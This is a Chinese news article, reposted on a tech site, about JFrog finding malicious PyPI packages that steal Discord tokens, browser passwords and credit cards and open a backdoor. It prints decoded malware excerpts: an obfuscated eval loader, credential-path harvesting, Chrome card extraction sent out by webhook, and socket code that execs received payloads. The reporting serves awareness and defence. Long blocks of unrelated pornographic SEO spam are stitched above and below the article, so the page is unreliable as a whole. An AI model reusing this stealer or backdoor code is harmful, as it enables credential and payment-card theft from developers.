精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

PyPI又雙叒叕發(fā)現(xiàn)惡意軟件,能盜取信用卡還有后門程序

新聞 應(yīng)用安全
Python程序員真的要小心了,PyPI軟件庫(kù)問(wèn)題真是越來(lái)越嚴(yán)重。繼今年6月出現(xiàn)挖礦病毒后,PyPI最近再次出現(xiàn)了一批惡意軟件。

[[415370]]

本文經(jīng)AI新媒體量子位(公眾號(hào)ID:QbitAI)授權(quán)轉(zhuǎn)載,轉(zhuǎn)載請(qǐng)聯(lián)系出處。

Python程序員真的要小心了,PyPI軟件庫(kù)問(wèn)題真是越來(lái)越嚴(yán)重。

繼今年6月出現(xiàn)挖礦病毒后,PyPI最近再次出現(xiàn)了一批惡意軟件,

JFrog安全團(tuán)隊(duì)發(fā)現(xiàn),PyPI庫(kù)中有多個(gè)軟件存在盜取信用卡信息遠(yuǎn)程注入代碼的行為,而這些軟件總共被下載了3萬(wàn)次。

這些被發(fā)現(xiàn)問(wèn)題的惡意軟件分別是:

PyPI又雙叒叕發(fā)現(xiàn)惡意軟件,能盜取信用卡還有后門程序

當(dāng)程序員安裝完這些軟件后,它們將在后臺(tái)不知不覺(jué)讀取瀏覽器文件夾,從而盜取信用卡信息和密碼。

它們是如何竊取信用卡信息的

安全研究人員發(fā)現(xiàn),上述所有軟件包都使用Base64編碼進(jìn)行偽裝。

比如上述的noblesse2:

  1. import base64, codecs 
  2. magic = 'aW1wb3J0IGNvbG9yYW1hLCBkYXRldGltZS...' 
  3. love = '0iLKOcY3L4Y2q1nJkxpl97nJE9Y2EyoTI0M...' 
  4. god = 'a2luZy5hcHBlbmQodG9rZW4pDQogICAgICAg...' 
  5. destiny = 'yxIKAVDaAQK3xjpQWkqRAboUcBIzqjEmS...' 
  6. joy = '\x72\x6f\x74\x31\x33' 
  7. trust = eval('\x6d\x61\x67\x69\x63') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64...'
  8. eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'','exec')) 

這種方法可以欺騙一些簡(jiǎn)單的分析工具,但是仔細(xì)研究可以發(fā)現(xiàn)其中的問(wèn)題。

以上8個(gè)軟件包分別包含了以下不同種類的惡意行為:

1、竊取Discord帳戶身份驗(yàn)證token

Discord身份驗(yàn)證token讀取器的代碼非常簡(jiǎn)單,它就是一組硬編碼的路徑:

  1. local = os.getenv('LOCALAPPDATA'
  2. roaming = os.getenv('APPDATA'
  3. paths = { 
  4.     'Discord': roaming + '\\Discord'
  5.     'Discord Canary': roaming + '\\discordcanary'
  6.     'Discord PTB': roaming + '\\discordptb'
  7.     'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default'
  8.     'Opera': roaming + '\\Opera Software\\Opera Stable'
  9.     'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default'
  10.     'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default' 

然后代碼會(huì)讀取這幾種瀏覽器路徑下的所有.log和.ldb文件,并查找Discord身份驗(yàn)證token,結(jié)果通過(guò)Webhook上傳到Discord。

2、竊取瀏覽器存儲(chǔ)的密碼或信用卡數(shù)據(jù)

當(dāng)你在瀏覽器中輸入密碼或信用卡數(shù)據(jù)時(shí),一般都會(huì)跳出如下窗口,提示用戶保存這些信息。

PyPI又雙叒叕發(fā)現(xiàn)惡意軟件,能盜取信用卡還有后門程序

雖然這給用戶帶來(lái)方便,今后不用一遍遍輸入密碼,但缺點(diǎn)是這些信息可能會(huì)惡意軟件獲取。

在這種情況下,惡意軟件會(huì)嘗試從Chrome竊取信用卡信息:

  1. def cs(): 
  2.     master_key = master() 
  3.     login_db = os.environ['USERPROFILE'] + os.sep + \ 
  4.         r'AppData\Local\Google\Chrome\User Data\default\Web Data' 
  5.     shutil.copy2(login_db, 
  6.                  "CCvault.db"
  7.     conn = sqlite3.connect("CCvault.db"
  8.     cursor = conn.cursor() 
  9.     try
  10.         cursor.execute("SELECT * FROM credit_cards"
  11.         for r in cursor.fetchall(): 
  12.             username = r[1
  13.             encrypted_password = r[4
  14.             decrypted_password = dpw( 
  15.                 encrypted_password, master_key) 
  16.             expire_mon = r[2
  17.             expire_year = r[3
  18.             hook.send(f"CARD-NAME: " + username + "\nNUMBER: " + decrypted_password + "\nEXPIRY M: " + str(expire_mon) + "\nEXPIRY Y: " + str(expire_year) + "\n" + "*" * 10 + "\n"

這些信息和前一種情況一樣會(huì)通過(guò)Webhook上傳。

3、收集有關(guān)受感染PC的信息:如IP地址、計(jì)算機(jī)名稱和用戶名

除此之外,這些軟件還會(huì)收集Windows許可證密鑰信息、Windows版本以及屏幕截圖。

4、遠(yuǎn)程代碼注入

pytagora和pytagora2這兩個(gè)惡意軟件會(huì)嘗試連接到某個(gè)IP地址9009端口上,然后執(zhí)行Socket中可用的任何Python代碼。

其中混淆的代碼被安全人員解碼成如下片段:

  1. import socket,struct,time 
  2. s=socket.socket(2,socket.socket.socket.SOCK_STREAM) 
  3. s.connect(('172.16.60.80',9009)) 
  4. l=struct.unpack('>I',s.recv(4))[0
  5. print (l) 
  6. d=s.recv(l) 
  7. print (d) 
  8. while len(d)>!1
  9. d+=s.recv(l-len(d)) 
  10. print (d) 
  11. exec(d,{'s':s}) 

但是安全人員現(xiàn)在不知道這個(gè)IP地址是什么,或者上面是否存在惡意軟件。

中毒后如何挽救

如果你發(fā)現(xiàn)自己的電腦已經(jīng)安裝了諸如noblesse的惡意軟件,那么請(qǐng)檢查一下你的瀏覽器到底保存了哪些密碼,這些密碼可能已經(jīng)泄露,請(qǐng)盡快修改。

對(duì)于Edge瀏覽器用戶,請(qǐng)?jiān)诘刂窓谥休斎雃dge://settings/passwords,查看已保存的密碼。

對(duì)于Chrome瀏覽器用戶,請(qǐng)?jiān)诘刂窓谥休斎隿hrome://settings/payments,在付款方式一欄下查看已保存的信用卡信息。

另外可以松口氣的是,PyPI維護(hù)人員已經(jīng)刪除了這些惡意軟件包。

雖然PyPI軟件庫(kù)現(xiàn)在是安全了,但是鑒于這些開(kāi)源軟件庫(kù)現(xiàn)在的維護(hù)狀態(tài),未來(lái)很可能還會(huì)遇到更多攻擊。今年P(guān)yPI庫(kù)出現(xiàn)安全問(wèn)題的狀況就不止一次出現(xiàn)。

[[415371]]

“攻擊者能夠使用簡(jiǎn)單的混淆技術(shù)來(lái)引入惡意軟件,這意味著開(kāi)發(fā)人員必須保持警惕。”

JFrog CTO說(shuō),“這是一個(gè)系統(tǒng)性威脅,需要由軟件存儲(chǔ)庫(kù)的維護(hù)者和開(kāi)發(fā)人員在多個(gè)層面積極解決。”

 

 

責(zé)任編輯:張燕妮 來(lái)源: 量子位
相關(guān)推薦

2021-08-05 06:22:02

惡意軟件Python軟件信用卡

2017-03-13 16:58:05

戴爾

2018-11-08 17:57:22

華為

2021-10-30 19:01:17

磁盤(pán)字節(jié)文件

2025-02-20 12:00:13

React前端React 19

2021-08-04 09:24:58

PyPI惡意軟件漏洞

2024-12-06 14:58:22

2024-04-03 15:41:53

服務(wù)器

2025-04-08 09:29:55

2020-05-18 13:23:59

寧暢

2023-01-10 11:37:22

Python 庫(kù)PySnooper項(xiàng)目

2018-01-17 16:36:40

Windows 10Windows免費(fèi)升級(jí)

2018-04-13 11:14:42

2017-11-21 10:13:11

微軟打印機(jī)補(bǔ)丁

2022-08-10 18:20:25

信用卡竊取新加坡網(wǎng)絡(luò)釣魚(yú)

2021-02-22 10:04:10

黑客Google AppsCSP

2020-09-01 11:00:14

UltraRank惡意代碼網(wǎng)絡(luò)攻擊

2023-12-15 09:19:44

百度飛槳文心大模型大模型

2022-08-10 18:23:39

Python軟件包索引惡意軟件

2020-03-27 22:29:16

信息安全網(wǎng)絡(luò)攻擊東京奧運(yùn)會(huì)
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

九九**精品视频免费播放| av免费观看一区二区| 91精品福利| 精品福利一二区| 精品中文字幕av| 风间由美一区| 国产宾馆实践打屁股91| 青青草99啪国产免费| 午夜激情福利电影| 国产精品任我爽爆在线播放| 欧美综合天天夜夜久久| 一本大道东京热无码aⅴ| 少妇高潮一区二区三区69| 青草av.久久免费一区| 久久久久久69| 东京热无码av男人的天堂| 亚洲精品一区二区三区中文字幕| 色综合色狠狠综合色| 国产成人免费高清视频| 欧美18xxxxx| 大陆成人av片| 91社区国产高清| 无码任你躁久久久久久久| 欧美激情五月| 日韩最新在线视频| 草草影院第一页| 亚洲日本视频在线| 欧美日韩精品一区二区三区| 草草久久久无码国产专区| 超碰在线caoporen| 国产精品视频麻豆| 免费试看一区| 色婷婷av一区二区三区之红樱桃| 精东粉嫩av免费一区二区三区| 51ⅴ精品国产91久久久久久| www.av视频| 91精品天堂福利在线观看| 亚洲视频综合网| 一级性生活大片| 国产精品流白浆在线观看| 日韩精品在线一区| 亚洲国产综合av| 精品一区二区三区亚洲| 欧美日韩大陆一区二区| 大香煮伊手机一区| 色www永久免费视频首页在线| 亚洲欧美自拍偷拍色图| 一区二区三区视频| 日本三级视频在线观看| 国产精品国产馆在线真实露脸| 日本一区二区三区四区高清视频 | 91精品综合久久久久久| 波多野结衣天堂| 91久久久久久白丝白浆欲热蜜臀| 在线视频欧美精品| 好男人www社区| 欧美日韩尤物久久| 欧美亚洲图片小说| 向日葵污视频在线观看| 高清亚洲高清| 欧美一区二区三区成人| 青娱乐国产精品视频| 国产精品99久久免费| 欧美一级日韩不卡播放免费| 无码人妻一区二区三区在线视频| 日韩欧美中文字幕在线视频| 精品国产网站在线观看| 日本一卡二卡在线| 亚洲精品中文字幕99999| 亚洲深夜福利视频| 性色国产成人久久久精品| 99久久婷婷国产综合精品电影√| 久久精品亚洲94久久精品| 免费在线一级片| 日韩午夜免费视频| 日本高清视频一区| 亚洲最新av网站| 国产高清在线精品| 久久久久九九九| 91精彩视频在线播放| 亚洲三级小视频| 国产精品国产对白熟妇| 国产欧美一区二区三区精品酒店| 欧美在线视频日韩| 一二三av在线| 第四色中文综合网| 永久555www成人免费| 天堂网avav| 国产精品社区| 国产精品中文字幕久久久| 一本一道人人妻人人妻αv| 国产一区二区三区免费看| 国产在线播放一区二区| 97在线观看免费观看高清| 亚洲精品国产视频| 91国视频在线| www.欧美| 国产视频精品xxxx| caoporn91| 久久久久99| av成人午夜| 北岛玲一区二区三区| 亚洲一区二区av电影| 色综合天天色综合| 伦理一区二区| 久久av在线播放| 超碰在线观看91| 播五月开心婷婷综合| 一区二区三区偷拍| 都市激情亚洲综合| 精品国产污污免费网站入口| 永久免费看片视频教学| 久久aⅴ乱码一区二区三区| 91精品在线观看视频| 精品影院一区| 天天免费综合色| 久久精品久久99| 成人毛片免费看| 26uuu另类亚洲欧美日本老年| 国产强被迫伦姧在线观看无码| 久久夜色精品国产欧美乱极品| 久草免费福利在线| 成人亚洲精品| 日韩在线播放视频| 最近中文字幕在线观看| 91麻豆国产在线观看| 国内少妇毛片视频| 国产乱码精品一区二区三区亚洲人 | 亚洲色图视频网站| 国产又粗又长又大的视频| 亚洲动漫在线观看| 欧美与欧洲交xxxx免费观看| 乱精品一区字幕二区| 亚洲欧美日韩一区二区| 潘金莲激情呻吟欲求不满视频| 国产一区二区三区站长工具| 国产91精品久久久| 网站黄在线观看| 亚洲第一av色| 亚洲av熟女高潮一区二区| 欧美久久99| 成人欧美一区二区三区视频| 18av在线视频| 欧美mv和日韩mv的网站| 欧美日韩中文字幕在线观看| 国产精品自拍网站| 亚洲黄色网址在线观看| 国产麻豆一区二区三区| 欧美成年人在线观看| 99精品久久久久久中文字幕 | 国产精品99精品无码视| 高清国产一区二区三区| 国产乱淫av片杨贵妃| 国产精品chinese在线观看| 欧美激情第6页| 亚洲国产精品欧美久久| 亚洲成av人片一区二区三区| 午夜av免费看| 久久看片网站| 五月婷婷一区| 小说区图片区亚洲| 久久这里有精品| 人妻无码中文字幕免费视频蜜桃| 亚洲国产精品欧美一二99| 熟妇高潮精品一区二区三区| 久久久成人网| 成人手机视频在线| 日韩亚洲精品在线观看| 国产69精品久久久久9999| 色天堂在线视频| 欧美日韩色综合| 婷婷色中文字幕| av成人免费在线| 久久婷婷国产91天堂综合精品| 国产精品精品国产一区二区| 成人动漫视频在线观看免费| 92国产精品| 久久精品国产亚洲7777| 亚洲国产精品18久久久久久| 一本到三区不卡视频| 手机在线中文字幕| 成人精品一区二区三区中文字幕| 国产三级日本三级在线播放| 欧美777四色影| 欧美一区二区三区在线免费观看| 四虎永久精品在线| 97久久精品人搡人人玩| 1024免费在线视频| 精品国产乱码久久久久久老虎| 在线观看 亚洲| 亚洲桃色在线一区| 菠萝菠萝蜜网站| 狠狠色丁香婷婷综合| 激情深爱综合网| 色婷婷色综合| 国产一区二区自拍| 999精品嫩草久久久久久99| 91国内在线视频| 色哟哟免费在线观看| 亚洲精品白浆高清久久久久久| 亚洲综合精品视频| 黑人巨大精品欧美一区免费视频| 神马久久精品综合| 91视频.com| 女王人厕视频2ⅴk| 蜜桃视频一区二区| 午夜免费福利小电影| 国产国产精品| 欧美精品一区二区视频| 欧美另类中文字幕| 国产精品久久久久久久久久久不卡| 日本在线观看高清完整版| 在线精品高清中文字幕| 亚洲欧洲国产综合| 日韩精品一区二区三区视频播放 | 蜜桃视频m3u8在线观看| 欧美精品亚州精品| 香蕉视频国产在线观看| 精品无人国产偷自产在线| 亚洲xxx在线| 51午夜精品国产| 亚洲综合成人av| 狠狠躁夜夜躁人人爽超碰91| 妺妺窝人体色www聚色窝仙踪| 中文字幕在线视频一区| 欧美丰满美乳xxⅹ高潮www| 99re6这里只有精品视频在线观看| 三上悠亚 电影| 国产经典欧美精品| 色呦色呦色精品| 久久精品国产精品亚洲综合| 免费黄色特级片| 噜噜噜躁狠狠躁狠狠精品视频| 妞干网在线视频观看| 黑丝一区二区三区| 男女裸体影院高潮| 欧美精品麻豆| 国产激情片在线观看| 亚洲九九在线| 看一级黄色录像| 2023国产精品久久久精品双| 国产卡一卡二在线| 围产精品久久久久久久| 综合久久国产| 久久久五月天| 996这里只有精品| 国产精品v日韩精品v欧美精品网站 | 国产九色精品| 老牛国内精品亚洲成av人片| 国产日韩欧美亚洲一区| 欧美jizz19性欧美| 久久综合给合久久狠狠色| 亚洲制服一区| 色999五月色| 天天插综合网| 男人的天堂视频在线| 极品av少妇一区二区| 免费在线观看亚洲视频| 久久资源在线| 成人av毛片在线观看| 国产精品影视在线| av在线播放网址| 国产亚洲精品免费| 战狼4完整免费观看在线播放版| 自拍偷在线精品自拍偷无码专区| 久久久久久久久久网站| 午夜久久久久久电影| 中文字幕一区二区人妻电影| 欧美三级日韩在线| 国产福利免费视频| 日韩电影网在线| 番号集在线观看| 久久福利网址导航| 日韩激情电影免费看| 国产精品v日韩精品| 91精品网站在线观看| 国产精品美女诱惑| 欧美精选视频在线观看| 日韩视频一二三| 久久久噜噜噜久久狠狠50岁| 狠狠干狠狠操视频| 不卡一区中文字幕| 女人黄色一级片| 亚洲一区av在线| 国产第一页在线观看| 欧美一区二区三区播放老司机| 深夜福利在线视频| www.午夜精品| 91久久国产综合久久91猫猫| 亚洲一区二区日本| 蜜桃国内精品久久久久软件9| 亚洲精品资源美女情侣酒店| 99国产精品免费视频| 成人黄页毛片网站| 日本人亚洲人jjzzjjz| 亚洲一区二区视频在线观看| 凹凸精品一区二区三区| 精品国产自在久精品国产| 国产三级视频在线| 久久久久久久久久国产| 日韩一区二区三免费高清在线观看| 高清日韩一区| 99久久99久久精品国产片桃花| 丁香花在线影院观看在线播放| 久久99精品国产麻豆婷婷洗澡| 韩国无码一区二区三区精品| 亚洲精品自拍动漫在线| 这里只有精品999| 亚洲精品电影网站| 在线视频中文字幕第一页| 国产精品久久久久久久美男| 欧美五码在线| a级片一区二区| 精品夜夜嗨av一区二区三区| 欧美做受高潮6| 精品久久久一区二区| 国产一区二区在线不卡| 中文字幕日韩精品在线观看| 松下纱荣子在线观看| 国产高清一区二区三区| 亚洲草久电影| 亚洲综合欧美激情| 国产日韩精品视频一区| 特级毛片www| 日韩精品久久久久久久玫瑰园| 婷婷色在线资源| 亚洲aⅴ男人的天堂在线观看| 99久久久久国产精品| 亚洲这里只有精品| 国产欧美日韩不卡| 亚洲大片免费观看| 亚洲精品资源在线| 亚洲承认视频| 欧美一区观看| 天堂资源在线中文精品| 白丝女仆被免费网站| 欧美日韩一区二区在线 | 亚洲国内在线| 免费人成网站在线观看欧美高清| 国产熟妇久久777777| 欧美性xxxx| 国产专区在线播放| 国产精品福利在线观看| 红桃视频在线观看一区二区| 日韩精品一区二区三区不卡| 久久久久国产精品麻豆| 久久精品五月天| 一区二区三区视频免费| 精品美女一区| 在线免费观看一区二区三区| 韩国三级中文字幕hd久久精品| fc2ppv在线播放| 欧美成人在线直播| 98色花堂精品视频在线观看| 激情小说综合网| 三级不卡在线观看| 青青草华人在线视频| 日韩无一区二区| 成人性生交大片免费看网站 | 天天在线女人的天堂视频| 日本久久久久久久久| 国产亚洲一区二区三区不卡| 亚洲人视频在线| 亚洲精品高清视频在线观看| 日本激情一区二区三区| 日韩免费在线播放| 国产一级特黄毛片| 久久超级碰视频| 懂色av蜜臀av粉嫩av永久| 69p69国产精品| 国产丝袜精品丝袜| 蜜桃日韩视频| 九色|91porny| 日本五十熟hd丰满| 伊人久久五月天| 日韩精品三级| 无码人妻丰满熟妇区毛片| 中文字幕亚洲一区二区va在线| 亚洲乱码国产乱码精品精软件| 日本精品性网站在线观看| 99国产精品免费视频观看| 日韩少妇一区二区| 欧美中文字幕一区二区三区亚洲 | 亚洲欧美日韩一区| 亚洲人在线观看视频| 国产在线精品成人一区二区三区| 黄色av日韩| 国产精品理论在线| 精品国产乱码久久久久久久 | 国产精品久久久久久久久婷婷 | 亚洲午夜视频在线| 第九色区av在线| 国产精品12| 久久精品国产77777蜜臀| 韩国av免费观看| 久久国产精品首页| 国产不卡av一区二区| 图片区偷拍区小说区| 欧美日韩一区小说| 亚洲欧美电影|